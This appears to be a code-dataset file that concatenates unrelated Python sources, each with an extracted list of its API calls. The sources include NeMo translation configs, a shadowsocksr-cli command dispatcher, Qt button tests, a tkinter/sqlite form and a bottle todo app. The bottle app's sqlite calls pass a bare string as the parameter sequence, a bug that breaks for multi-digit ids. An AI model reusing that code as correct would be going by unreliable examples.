audio_codec=guess.get('audio_codec'), year=guess.get('year'))
@classmethod
def fromname(cls, name):
return cls.fromguess(name, guessit(name, {'type': 'movie'}))
def __repr__(self):
if self.year is None:
return '<%s [%r]>' % (self.__class__.__name__, self.title)
return '<%s [%r, %d]>' % (self.__class__.__name__, self.title, self.year)
| [
"logging.getLogger",
"os.path.exists",
"datetime.datetime.utcnow",
"os.path.getmtime",
"datetime.timedelta",
"guessit.guessit"
]
| [((161, 188), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (178, 188), False, 'import logging\n'), ((2830, 2855), 'os.path.exists', 'os.path.exists', (['self.name'], {}), '(self.name)\n', (2844, 2855), False, 'import os\n'), ((3055, 3066), 'datetime.timedelta', 'timedelta', ([], {}), '()\n', (3064, 3066), False, 'from datetime import datetime, timedelta\n'), ((6352, 6386), 'guessit.guessit', 'guessit', (['name', "{'type': 'episode'}"], {}), "(name, {'type': 'episode'})\n", (6359, 6386), False, 'from guessit import guessit\n'), ((7744, 7776), 'guessit.guessit', 'guessit', (['name', "{'type': 'movie'}"], {}), "(name, {'type': 'movie'})\n", (7751, 7776), False, 'from guessit import guessit\n'), ((2964, 2981), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2979, 2981), False, 'from datetime import datetime, timedelta\n'), ((3921, 3951), 'guessit.guessit', 'guessit', (['name'], {'options': 'options'}), '(name, options=options)\n', (3928, 3951), False, 'from guessit import guessit\n'), ((4006, 4019), 'guessit.guessit', 'guessit', (['name'], {}), '(name)\n', (4013, 4019), False, 'from guessit import guessit\n'), ((3010, 3037), 'os.path.getmtime', 'os.path.getmtime', (['self.name'], {}), '(self.name)\n', (3026, 3037), False, 'import os\n')] |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import Any, Optional, Tuple
from omegaconf.omegaconf import MISSING
from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig
from nemo.collections.nlp.models.enc_dec_nlp_model import EncDecNLPModelConfig
from nemo.collections.nlp.modules.common.token_classifier import TokenClassifierConfig
from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig
from nemo.collections.nlp.modules.common.transformer.transformer import (
NeMoTransformerConfig,
NeMoTransformerEncoderConfig,
)
from nemo.core.config.modelPT import ModelConfig, OptimConfig, SchedConfig
@dataclass
class MTSchedConfig(SchedConfig):
name: str = 'InverseSquareRootAnnealing'
warmup_ratio: Optional[float] = None
last_epoch: int = -1
# TODO: Refactor this dataclass to to support more optimizers (it pins the optimizer to Adam-like optimizers).
@dataclass
class MTOptimConfig(OptimConfig):
name: str = 'adam'
lr: float = 1e-3
betas: Tuple[float, float] = (0.9, 0.98)
weight_decay: float = 0.0
sched: Optional[MTSchedConfig] = MTSchedConfig()
@dataclass
class MTEncDecModelConfig(EncDecNLPModelConfig):
# machine translation configurations
num_val_examples: int = 3
num_test_examples: int = 3
max_generation_delta: int = 10
label_smoothing: Optional[float] = 0.0
beam_size: int = 4
len_pen: float = 0.0
src_language: str = 'en'
tgt_language: str = 'en'
find_unused_parameters: Optional[bool] = True
shared_tokenizer: Optional[bool] = True
preproc_out_dir: Optional[str] = None
# network architecture configuration
encoder_tokenizer: Any = MISSING
encoder: Any = MISSING
decoder_tokenizer: Any = MISSING
decoder: Any = MISSING
head: TokenClassifierConfig = TokenClassifierConfig(log_softmax=True)
# dataset configurations
train_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=True,
shuffle=True,
cache_ids=False,
use_cache=False,
)
validation_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=False,
shuffle=False,
cache_ids=False,
use_cache=False,
)
test_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=False,
shuffle=False,
cache_ids=False,
use_cache=False,
)
optim: Optional[OptimConfig] = MTOptimConfig()
@dataclass
class AAYNBaseConfig(MTEncDecModelConfig):
# Attention is All You Need Base Configuration
encoder_tokenizer: TokenizerConfig = TokenizerConfig(library='yttm')
decoder_tokenizer: TokenizerConfig = TokenizerConfig(library='yttm')
encoder: NeMoTransformerEncoderConfig = NeMoTransformerEncoderConfig(
library='nemo',
model_name=None,
pretrained=False,
hidden_size=512,
inner_size=2048,
num_layers=6,
num_attention_heads=8,
ffn_dropout=0.1,
attn_score_dropout=0.1,
attn_layer_dropout=0.1,
)
decoder: NeMoTransformerConfig = NeMoTransformerConfig(
library='nemo',
model_name=None,
pretrained=False,
inner_size=2048,
num_layers=6,
num_attention_heads=8,
ffn_dropout=0.1,
attn_score_dropout=0.1,
attn_layer_dropout=0.1,
)
| [
"nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerEncoderConfig",
"nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerConfig",
"nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig",
"nemo.collections.nlp.modules.common.token_classifier.TokenClassifierConfig",
"nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig"
]
| [((2471, 2510), 'nemo.collections.nlp.modules.common.token_classifier.TokenClassifierConfig', 'TokenClassifierConfig', ([], {'log_softmax': '(True)'}), '(log_softmax=True)\n', (2492, 2510), False, 'from nemo.collections.nlp.modules.common.token_classifier import TokenClassifierConfig\n'), ((2589, 2745), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(True)', 'shuffle': '(True)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=True, shuffle=True, cache_ids=False,\n use_cache=False)\n', (2610, 2745), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((2854, 3012), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(False)', 'shuffle': '(False)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=False, shuffle=False, cache_ids=False,\n use_cache=False)\n', (2875, 3012), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((3115, 3273), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(False)', 'shuffle': '(False)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=False, shuffle=False, cache_ids=False,\n use_cache=False)\n', (3136, 3273), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((3529, 3560), 'nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig', 'TokenizerConfig', ([], {'library': '"""yttm"""'}), "(library='yttm')\n", (3544, 3560), False, 'from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig\n'), ((3602, 3633), 'nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig', 'TokenizerConfig', ([], {'library': '"""yttm"""'}), "(library='yttm')\n", (3617, 3633), False, 'from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig\n'), ((3679, 3907), 'nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerEncoderConfig', 'NeMoTransformerEncoderConfig', ([], {'library': '"""nemo"""', 'model_name': 'None', 'pretrained': '(False)', 'hidden_size': '(512)', 'inner_size': '(2048)', 'num_layers': '(6)', 'num_attention_heads': '(8)', 'ffn_dropout': '(0.1)', 'attn_score_dropout': '(0.1)', 'attn_layer_dropout': '(0.1)'}), "(library='nemo', model_name=None, pretrained=\n False, hidden_size=512, inner_size=2048, num_layers=6,\n num_attention_heads=8, ffn_dropout=0.1, attn_score_dropout=0.1,\n attn_layer_dropout=0.1)\n", (3707, 3907), False, 'from nemo.collections.nlp.modules.common.transformer.transformer import NeMoTransformerConfig, NeMoTransformerEncoderConfig\n'), ((4020, 4219), 'nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerConfig', 'NeMoTransformerConfig', ([], {'library': '"""nemo"""', 'model_name': 'None', 'pretrained': '(False)', 'inner_size': '(2048)', 'num_layers': '(6)', 'num_attention_heads': '(8)', 'ffn_dropout': '(0.1)', 'attn_score_dropout': '(0.1)', 'attn_layer_dropout': '(0.1)'}), "(library='nemo', model_name=None, pretrained=False,\n inner_size=2048, num_layers=6, num_attention_heads=8, ffn_dropout=0.1,\n attn_score_dropout=0.1, attn_layer_dropout=0.1)\n", (4041, 4219), False, 'from nemo.collections.nlp.modules.common.transformer.transformer import NeMoTransformerConfig, NeMoTransformerEncoderConfig\n')] |
"""
@author: tyrantlucifer
@contact: <EMAIL>
@blog: https://tyrantlucifer.com
@file: main.py
@time: 2021/2/18 21:36
@desc: shadowsocksr-cli入口函数
"""
import argparse
import traceback
from shadowsocksr_cli.functions import *
def get_parser():
parser = argparse.ArgumentParser(description=color.blue("The shadowsocksr command client based Python."),
epilog=color.yellow('Powered by ') + color.green('tyrantlucifer') + color.yellow(
". If you have any questions,you can send e-mails to ") + color.green(
"<EMAIL>"))
parser.add_argument("-l", "--list", action="store_true", help="show ssr list")
parser.add_argument("-p", "--port", default=1080, metavar="local_port", type=int,
help="assign local proxy port,use with -s")
parser.add_argument("-s", "--start", metavar="ssr_id", type=int, help="start ssr proxy")
parser.add_argument("-S", "--stop", nargs='?', const=-1, metavar="ssr_id", type=int, help="stop ssr proxy")
parser.add_argument("-u", "--update", action="store_true", help="update ssr list")
parser.add_argument("-v", "--version", action="store_true", help="display version")
parser.add_argument("--generate-clash", action="store_true", help="generate clash config yaml")
parser.add_argument("--display-json", metavar="ssr_id", type=int, help="display ssr json info")
parser.add_argument("--test-speed", type=int, metavar="ssr_id", help="test ssr nodes download and upload speed")
parser.add_argument("--fast-node", action="store_true", help="find most fast by delay and start ssr proxy")
parser.add_argument("--setting-url", metavar="ssr_subscribe_url", help="setting ssr subscribe url")
parser.add_argument("--setting-address", metavar="ssr_local_address", help="setting ssr local address")
parser.add_argument("--list-url", action="store_true", help="list ssr subscribe url")
parser.add_argument("--add-url", metavar="ssr_subscribe_url", help="add ssr subscribe url")
parser.add_argument("--remove-url", metavar="ssr_subscribe_url", help="remove ssr subscribe url")
parser.add_argument("--list-address", action="store_true", help="list ssr local address")
parser.add_argument("--parse-url", metavar="ssr_url", help="pares ssr url")
parser.add_argument("--append-ssr", metavar="ssr_file_path", help="append ssr nodes from file")
parser.add_argument("-b", action="store_true", help="append_ssr file is base64")
parser.add_argument("--clear-ssr", metavar="ssr_id", nargs="?", const="fail",
help="if ssr_id is not empty, clear ssr node by ssr_id, else clear fail nodes")
parser.add_argument("-all", action="store_true", help="clear all ssr node")
parser.add_argument("--add-ssr", metavar="ssr_url", help="add ssr node")
parser.add_argument("--test-again", metavar="ssr_node_id", type=int, help="test ssr node again")
parser.add_argument("--print-qrcode", metavar="ssr_node_id", type=int, help="print ssr node qrcode")
parser.add_argument("--http", metavar="action[start stop status]", help="Manager local http server")
parser.add_argument("--http-port", metavar="http server port", default=80, type=int,
help="assign local http server port")
parser.add_argument("--setting-global-proxy", action="store_true",
help="setting system global proxy,only support on " + color.red('Ubuntu Desktop'))
parser.add_argument("--setting-pac-proxy", action="store_true",
help="setting system pac proxy,only support on " + color.red('Ubuntu Desktop'))
parser.add_argument("--close-system-proxy", action="store_true",
help="close system proxy,only support on " + color.red('Ubuntu Desktop'))
return parser
def main():
parser = get_parser()
args = parser.parse_args()
if args.list:
DisplayShadowsocksr.display_shadowsocksr_list()
elif args.update:
UpdateConfigurations.update_subscribe()
elif args.fast_node:
HandleShadowsocksr.select_fast_node(args.port)
elif args.start is not None:
HandleShadowsocksr.start(ssr_id=args.start, local_port=args.port)
elif args.stop is not None:
HandleShadowsocksr.stop(ssr_id=args.stop, local_port=args.port)
elif args.version:
DisplayShadowsocksr.display_version()
elif args.setting_url:
UpdateConfigurations.reset_subscribe_url(args.setting_url)
elif args.append_ssr:
if not os.path.isfile(args.append_ssr):
logger.error(f'append_ssr file {args.append_ssr} is not exists')
return
with open(args.append_ssr, 'r', encoding='UTF-8') as f:
txt = f.read()
if args.b:
txt = ParseShadowsocksr.base64_decode(txt)
ssr_set = set()
for line in txt.splitlines():
for ssr in re.findall(r'ssr://[0-9a-zA-Z=-_/+]+', line):
ssr_set.add(ssr)
for ssr in ssr_set:
try:
UpdateConfigurations.append_ssr_node(ssr)
except Exception as e:
logger.error(f'add ssr node error {ssr}')
logger.error(traceback.format_exc())
elif args.clear_ssr:
UpdateConfigurations.clear_ssr_nodes(args.clear_ssr, args.all)
elif args.setting_address:
UpdateConfigurations.update_local_address(args.setting_address)
elif args.list_url:
DisplayShadowsocksr.display_subscribe_url()
elif args.add_url:
UpdateConfigurations.add_subscribe_url(args.add_url)
elif args.remove_url:
UpdateConfigurations.remove_subscribe_url(args.remove_url)
elif args.list_address:
DisplayShadowsocksr.display_local_address()
elif args.parse_url:
DisplayShadowsocksr.display_shadowsocksr_json_by_url(args.parse_url)
elif args.add_ssr:
UpdateConfigurations.add_shadowsocksr_by_url(args.add_ssr)
elif args.test_again is not None:
UpdateConfigurations.update_shadowsocksr_connect_status(ssr_id=args.test_again)
elif args.print_qrcode is not None:
DisplayShadowsocksr.display_qrcode(ssr_id=args.print_qrcode)
elif args.setting_global_proxy:
UpdateSystemProxy.open_global_proxy(args.port, args.http_port)
elif args.setting_pac_proxy:
UpdateSystemProxy.open_pac_proxy(args.port, args.http_port)
elif args.close_system_proxy:
UpdateSystemProxy.close_proxy(args.port, args.http_port)
elif args.test_speed is not None:
DisplayShadowsocksr.display_shadowsocksr_speed(ssr_id=args.test_speed)
elif args.display_json is not None:
DisplayShadowsocksr.display_shadowsocksr_json(ssr_id=args.display_json)
elif args.generate_clash:
GenerateClashConfig.generate_clash_config()
elif args.http:
HandleHttpServer.handle_http_server(args.http, args.port, args.http_port)
else:
parser.print_help()
if __name__ == "__main__":
main()
| [
"traceback.format_exc"
]
| [((5276, 5298), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (5296, 5298), False, 'import traceback\n')] |
import os
import sys
import pytest
from msl.qt import convert, Button, QtWidgets, QtCore, Qt
def test_text():
b = Button(text='hello')
assert b.text() == 'hello'
assert b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextOnly
def test_icon():
path = os.path.dirname(__file__) + '/gamma.png'
gamma_size = QtCore.QSize(191, 291)
int_val = QtWidgets.QStyle.SP_DriveNetIcon
icon = convert.to_qicon(int_val)
sizes = icon.availableSizes()
if sys.platform == 'win32':
assert len(sizes) > 1
b = Button(icon=int_val)
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == sizes[0]
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
b = Button(icon=path)
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == gamma_size
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
b = Button(icon=convert.icon_to_base64(convert.to_qicon(path)))
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == gamma_size
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
def test_icon_size():
int_val = QtWidgets.QStyle.SP_DriveNetIcon
icon = convert.to_qicon(int_val)
sizes = icon.availableSizes()
if sys.platform == 'win32':
assert len(sizes) > 1
#
# specify the size to the get_icon function
#
b = Button(icon=convert.to_qicon(int_val))
assert b.text() == ''
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
assert b.iconSize() == sizes[0]
b = Button(icon=convert.to_qicon(int_val, size=789))
assert b.iconSize() == QtCore.QSize(789, 789)
b = Button(icon=convert.to_qicon(int_val, size=3.0))
# specifying a scale factor will use the largest available size
assert b.iconSize() == QtCore.QSize(3*sizes[-1].width(), 3*sizes[-1].height())
b = Button(icon=convert.to_qicon(int_val, size=QtCore.QSize(50, 50)))
assert b.iconSize() == QtCore.QSize(50, 50)
for size in [(256,), (256, 256, 256)]:
with pytest.raises(ValueError, match='(width, height)'):
Button(icon=convert.to_qicon(int_val, size=size))
#
# use the icon_size kwarg
#
b = Button(icon=convert.to_qicon(int_val), icon_size=1234)
assert b.iconSize() == QtCore.QSize(1234, 1234)
b = Button(icon=convert.to_qicon(int_val), icon_size=3.0)
# specifying a scale factor will use the largest available size
assert b.iconSize() == QtCore.QSize(3*sizes[-1].width(), 3*sizes[-1].height())
b = Button(icon=convert.to_qicon(int_val), icon_size=(312, 312))
assert b.iconSize() == QtCore.QSize(312, 312)
b = Button(icon=convert.to_qicon(int_val), icon_size=QtCore.QSize(500, 500))
assert b.iconSize() == QtCore.QSize(500, 500)
for size in [(256,), (256, 256, 256)]:
with pytest.raises(ValueError, match='(width, height)'):
Button(icon=convert.to_qicon(int_val), icon_size=size)
def test_text_and_icon():
b = Button(text='hello', icon=QtWidgets.QStyle.SP_DriveNetIcon)
assert b.text() == 'hello'
assert not b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextUnderIcon
b = Button(text='world', icon=QtWidgets.QStyle.SP_DriveNetIcon, is_text_under_icon=False)
assert b.text() == 'world'
assert not b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextBesideIcon
def test_tooltip():
b = Button(tooltip='hello')
assert b.text() == ''
assert b.icon().isNull()
assert b.toolTip() == 'hello'
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
| [
"msl.qt.convert.to_qicon",
"os.path.dirname",
"msl.qt.QtCore.QSize",
"msl.qt.Button",
"pytest.raises"
]
| [((122, 142), 'msl.qt.Button', 'Button', ([], {'text': '"""hello"""'}), "(text='hello')\n", (128, 142), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((347, 369), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(191)', '(291)'], {}), '(191, 291)\n', (359, 369), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((429, 454), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (445, 454), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((560, 580), 'msl.qt.Button', 'Button', ([], {'icon': 'int_val'}), '(icon=int_val)\n', (566, 580), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((741, 758), 'msl.qt.Button', 'Button', ([], {'icon': 'path'}), '(icon=path)\n', (747, 758), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1216, 1241), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (1232, 1241), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3013, 3072), 'msl.qt.Button', 'Button', ([], {'text': '"""hello"""', 'icon': 'QtWidgets.QStyle.SP_DriveNetIcon'}), "(text='hello', icon=QtWidgets.QStyle.SP_DriveNetIcon)\n", (3019, 3072), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3207, 3296), 'msl.qt.Button', 'Button', ([], {'text': '"""world"""', 'icon': 'QtWidgets.QStyle.SP_DriveNetIcon', 'is_text_under_icon': '(False)'}), "(text='world', icon=QtWidgets.QStyle.SP_DriveNetIcon,\n is_text_under_icon=False)\n", (3213, 3296), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3449, 3472), 'msl.qt.Button', 'Button', ([], {'tooltip': '"""hello"""'}), "(tooltip='hello')\n", (3455, 3472), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((289, 314), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'import os\n'), ((1650, 1672), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(789)', '(789)'], {}), '(789, 789)\n', (1662, 1672), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1984, 2004), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(50)', '(50)'], {}), '(50, 50)\n', (1996, 2004), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2310, 2334), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(1234)', '(1234)'], {}), '(1234, 1234)\n', (2322, 2334), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2646, 2668), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(312)', '(312)'], {}), '(312, 312)\n', (2658, 2668), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2778, 2800), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(500)', '(500)'], {}), '(500, 500)\n', (2790, 2800), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1420, 1445), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (1436, 1445), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1586, 1621), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': '(789)'}), '(int_val, size=789)\n', (1602, 1621), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1694, 1729), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': '(3.0)'}), '(int_val, size=3.0)\n', (1710, 1729), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2062, 2112), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""(width, height)"""'}), "(ValueError, match='(width, height)')\n", (2075, 2112), False, 'import pytest\n'), ((2240, 2265), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2256, 2265), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2356, 2381), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2372, 2381), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2570, 2595), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2586, 2595), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2690, 2715), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2706, 2715), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2727, 2749), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(500)', '(500)'], {}), '(500, 500)\n', (2739, 2749), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2858, 2908), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""(width, height)"""'}), "(ValueError, match='(width, height)')\n", (2871, 2908), False, 'import pytest\n'), ((956, 978), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['path'], {}), '(path)\n', (972, 978), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1934, 1954), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(50)', '(50)'], {}), '(50, 50)\n', (1946, 1954), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2138, 2174), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': 'size'}), '(int_val, size=size)\n', (2154, 2174), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2934, 2959), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2950, 2959), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n')] |
from tkinter import*
import tkinter.font as font
import sqlite3
name2=''
regis2=''
branch2=''
def main():
inp=Tk()
inp.geometry("430x300")
inp.title("Enter The Details")
inp.iconbitmap("logo/spectrumlogo.ico")
f=font.Font(family='Bookman Old Style',size=15,weight='bold')
f1=font.Font(family='Bookman Old Style',size=20,weight='bold')
global n2
global reg2
global b2
det=Label(inp,text=" Enter The Details\n",font=f1,fg='magenta')
det.grid(row=0,column=0,columnspan=2)
n1=Label(inp,text=" Name:",font=f)
n1.grid(row=1,column=0)
n2=Entry(inp,width=40)
n2.grid(row=1,column=1)
reg1=Label(inp,text="Registration ID:",font=f)
reg1.grid(row=2,column=0)
reg2=Entry(inp,width=40)
reg2.grid(row=2,column=1)
b1=Label(inp,text=" Branch:",font=f)
b1.grid(row=3,column=0)
b2=Entry(inp,width=40)
b2.grid(row=3,column=1)
invalid=Label(inp,text=' ',fg='red')
invalid.grid(row=4,columnspan=2)
def submit():
name2=n2.get()
regis2=reg2.get()
branch2=b2.get()
l=[name2,regis2,branch2]
if (None in l or "" in l):
invalid['text']="Please fill all the fields"
else:
db=sqlite3.connect("mark_list.db")
#cursor
c=db.cursor()
#insert into tabels
c.execute("""UPDATE mark_list SET name=? WHERE name=?""",(name2,' '))
c.execute("""UPDATE mark_list SET registration_no=? WHERE registration_no=?""",(regis2,' '))
c.execute("""UPDATE mark_list SET branch=? WHERE branch=?""",(branch2,' '))
#commit_changes
db.commit()
#close connection
db.close()
inp.destroy()
import subject
subject.main()
def back():
db=sqlite3.connect("mark_list.db")
#cursor
c=db.cursor()
c.execute("""DELETE from mark_list where name=' '""")
#commit_changes
db.commit()
#close connection
db.close()
inp.destroy()
import welcome
welcome.main()
#buttons
sub1=Button(inp,text="Submit",borderwidth=3,padx=40,font=f,bg='green',command=submit)
sub1.grid(row=5,column=0,columnspan=2)
back1=Button(inp,text="Back",borderwidth=3,padx=20,font=f,bg='red',command=back)
back1.grid(row=6,column=0,columnspan=2)
inp.mainloop()
if __name__=='__main__':
main()
| [
"tkinter.font.Font",
"subject.main",
"sqlite3.connect",
"welcome.main"
]
| [((251, 312), 'tkinter.font.Font', 'font.Font', ([], {'family': '"""Bookman Old Style"""', 'size': '(15)', 'weight': '"""bold"""'}), "(family='Bookman Old Style', size=15, weight='bold')\n", (260, 312), True, 'import tkinter.font as font\n'), ((319, 380), 'tkinter.font.Font', 'font.Font', ([], {'family': '"""Bookman Old Style"""', 'size': '(20)', 'weight': '"""bold"""'}), "(family='Bookman Old Style', size=20, weight='bold')\n", (328, 380), True, 'import tkinter.font as font\n'), ((2002, 2033), 'sqlite3.connect', 'sqlite3.connect', (['"""mark_list.db"""'], {}), "('mark_list.db')\n", (2017, 2033), False, 'import sqlite3\n'), ((2306, 2320), 'welcome.main', 'welcome.main', ([], {}), '()\n', (2318, 2320), False, 'import welcome\n'), ((1369, 1400), 'sqlite3.connect', 'sqlite3.connect', (['"""mark_list.db"""'], {}), "('mark_list.db')\n", (1384, 1400), False, 'import sqlite3\n'), ((1956, 1970), 'subject.main', 'subject.main', ([], {}), '()\n', (1968, 1970), False, 'import subject\n')] |
import sqlite3
from bottle import route, run,debug,template,request,redirect
@route('/todo')
def todo_list():
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT id, task FROM todo WHERE status LIKE '1'")
result = c.fetchall()
c.close()
output = template('make_table', rows=result)
return output
@route('/new', method='GET')
def new_item():
if request.GET.save:
new = request.GET.task.strip()
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("INSERT INTO todo (task,status) VALUES (?,?)", (new,1))
new_id = c.lastrowid
conn.commit()
c.close()
redirect('/todo')
#return '<p>The new task was inserted into the database, the ID is %s</p>' % new_id
else:
return template('new_task.tpl')
@route('/do_insert' , method='GET')
def get_id():
redirect('/new')
@route('/edit/<no:int>', method='GET')
def edit_item(no):
if request.GET.save:
edit = request.GET.task.strip()
status = request.GET.status.strip()
if status == 'open':
status = 1
else:
status = 0
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("UPDATE todo SET task = ?, status = ? WHERE id LIKE ?", (edit, status, no))
conn.commit()
return '<p>The item number %s was successfully updated</p>' % no
else:
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT task FROM todo WHERE id LIKE ?", (str(no)))
cur_data = c.fetchone()
return template('edit_task', old=cur_data, no=no)
@route('/find_edit' , method='GET')
def get_id():
id_edit = request.GET.editdata.strip()
redirect('/edit/' + id_edit)
@route('/delete/<no:int>', method='GET')
def delete_item(no):
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("DELETE FROM todo WHERE id LIKE ?", (str(no)))
conn.commit()
redirect('/todo')
@route('/find_delete' , method='GET')
def get_id():
id_delete = request.GET.deletedata.strip()
redirect('/delete/' + id_delete)
debug(True)
run(reloader=True)
| [
"bottle.template",
"bottle.request.GET.deletedata.strip",
"sqlite3.connect",
"bottle.request.GET.status.strip",
"bottle.route",
"bottle.request.GET.task.strip",
"bottle.debug",
"bottle.request.GET.editdata.strip",
"bottle.run",
"bottle.redirect"
]
